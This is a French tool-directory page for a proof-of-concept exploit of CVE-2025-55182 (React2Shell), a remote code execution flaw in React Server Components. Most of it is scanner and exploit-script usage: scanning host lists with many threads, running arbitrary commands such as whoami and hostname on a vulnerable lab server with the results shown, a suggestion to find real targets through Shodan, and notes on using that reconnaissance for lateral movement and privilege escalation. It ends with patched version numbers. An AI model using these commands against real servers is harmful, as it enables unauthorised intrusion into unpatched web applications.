Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
React2Shell-PoC-CVE-2025-55182 — Preuve de concept de l'exploit pour la vulnérabilité RCE CVE-2025-55182 (React2Shell) dans les composants serveur React. Inclut un scanner pour les hôtes vulnérables et un script shell pour l'exécution de commandes à distance. Réservé aux tests de sécurité autorisés et à des fins éducatives uniquement. | Kitploit
Outils/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubeagle-nett/react2shell-poc-cve-2025-55182

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

React2Shell-PoC-CVE-2025-55182

Voir le dépôt
1il y a 5 moisPas encore vérifié

À propos

Preuve de concept de l'exploit pour la vulnérabilité RCE CVE-2025-55182 (React2Shell) dans les composants serveur React. Inclut un scanner pour les hôtes vulnérables et un script shell pour l'exécution de commandes à distance. Réservé aux tests de sécurité autorisés et à des fins éducatives uniquement.

Partager

Simulation d'exploitation de React2Shell (CVE-2025-55182)

Remarque :

  • Ce document est uniquement destiné à des fins d'apprentissage et de recherche en sécurité.
  • Ne pas l'utiliser pour attaquer des systèmes sans autorisation.

1. Vue d'ensemble

CVE-2025-55182, également connu sous le nom de React2Shell, est une grave vulnérabilité d'exécution de code à distance (RCE) affectant les React Server Components (RSC). Elle utilise le protocole Flight pour la communication entre le client et le serveur. Lorsque le client demande des données, le serveur reçoit un payload, l'analyse, ce qui peut permettre à un attaquant d'injecter des structures malveillantes ou des morceaux de code arbitraires que React accepte comme valides.

ÉlémentContenu
NiveauCritical (CVSS 10.0)
TypeUnsafe Deserialization (CWE-502)
Méthode d'attaqueRemote, no authentication required
Versions affectées :React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 et Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. Cause

Le serveur traite le payload du client sans validation complète, permettant à un attaquant de :

  • Injecter un payload malveillant
  • Exécuter du code sur le serveur
  • Être exploité sans authentification utilisateur car il s'agit d'une vulnérabilité précédant l'authentification.

L'activité d'exploitation liée à cette vulnérabilité a été détectée depuis le 5 décembre 2025. La plupart des exploitations réussies proviennent d'évaluations de groupes d'attaque. Les environnements Windows et Linux sont tous deux affectés.

3. Expérimentation

Installation

root@kitploit:~
pip install -r requirements.txt

Scanner un serveur vulnérable :

root@kitploit:~
python3 scanner.py -u https://example.com

Entrez le chemin à scanner (ici j'utilise ma machine vulnérable http://192.168.10.1:3000)

image

Résultat obtenu :

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

De plus, vous pouvez également scanner selon vos objectifs d'exploitation :

Scanner une liste d'hôtes :

root@kitploit:~
python3 scanner.py -l hosts.txt

Scanner avec plusieurs threads et enregistrer les résultats :

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Scanner avec des en-têtes personnalisés :

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Scanner les cibles Windows :

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Utiliser une méthode de détection de canal latéral sécurisée :

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

Comme vous le voyez, nous rencontrons une vulnérabilité de sécurité, ce qui signifie que le serveur que nous fournissons est facilement attaquable par un attaquant.


Nuclei

Maintenant, nous allons utiliser Nuclei pour vérifier quelle vulnérabilité affecte le serveur ci-dessus et s'il existe un POC. Cette fonctionnalité fonctionne en envoyant des requêtes personnalisées, en minimisant les faux positifs et en prenant en charge le scan parallèle.

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

Résultat obtenu

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

Le système a détecté que ce serveur est vulnérable et peut être exploité par la vulnérabilité CVE-2025-55182. Et de là, vous pouvez voir qu'il s'agit d'une vulnérabilité assez dangereuse et importante pour laquelle il existe déjà de nombreux POC sur les plateformes sociales. ☺☺☺

4. Méthode d'exploitation

Vous pouvez voir que ces informations suffisent à confirmer l'existence de la vulnérabilité de sécurité dans l'application ci-dessus. Pour prouver que cette application peut être exploitée pour exécuter une commande ou du code à distance, je vais commencer un PoC.

root@kitploit:~
chmod +x scanner.sh

Utilisation

root@kitploit:~
# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com

# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

Signification :

  • Retourne l'utilisateur actuel qui exécute le processus serveur
  • Aide à déterminer :
    • sous quel utilisateur l'application s'exécute
    • le niveau de privilèges (faible privilège ou administrateur) => C'est la commande la plus basique pour confirmer un RCE réussi

Remarque

  • -d, --domain - domain/URL
  • -c, --command - Commande à exécuter (ex: whoami, hostname,...)

Exemples

root@kitploit:~
# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

ILLUSTRATION APRÈS EXÉCUTION

image

C'est l'étape de reconnaissance initiale après une exploitation réussie.

Nous permet de confirmer : le RCE fonctionne, déterminer le système d'exploitation,...

ATTENTION

Comme cette expérimentation est démontrée dans un environnement de laboratoire personnel pour éviter toute infraction légale, l'utilisation d'en-têtes HTTP pour voler des données, les sorties volumineuses ou les caractères spéciaux peuvent provoquer :

  • ERR_INVALID_CHAR
  • Réduction de la réponse
  • Timeouts
image

Les commandes courtes (par exemple : whoami, ver) sont plus fiables pour illustrer dans l'environnement de test ci-dessus.

Si vous préférez, vous pouvez utiliser Shodan pour vérifier les adresses IP directement dans l'environnement réel et suivre mon expérimentation ci-dessus pour exploiter (non recommandé).

image

Comme indiqué ci-dessus. Cet outil est uniquement destiné à des fins éducatives et de tests de sécurité autorisés. N'utilisez pas cet outil pour tester des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de test.

5. Quelques correctifs pour la vulnérabilité

  • Ne pas faire confiance aux données du client
  • Valider rigoureusement les entrées
  • Mettre à jour les versions
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. Références supplémentaires

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
Télécharger l’outil
Signification des commandes exécutéesContenu
Retourne le nom de la machine (hostname)Utilisé pour :
- identifier le système affecté
- servir au mouvement latéral (dans un environnement interne)
Détermine la version du système d'exploitationImportant pour :
- évaluer la possibilité d'exploitation ultérieure (élévation de privilèges)
- choisir l'exploit approprié
Vérifie l'exécution de commandeUtilisé pour déboguer le payload / scanner
Retourne le nom d'utilisateur actuelDans ce cas :
- l'utilisateur est ADMIN → peut avoir des privilèges élevés
- Plus important que whoami dans certains cas Windows
Retourne le nom de la machineRetourne le nom de la machine via une variable d'environnement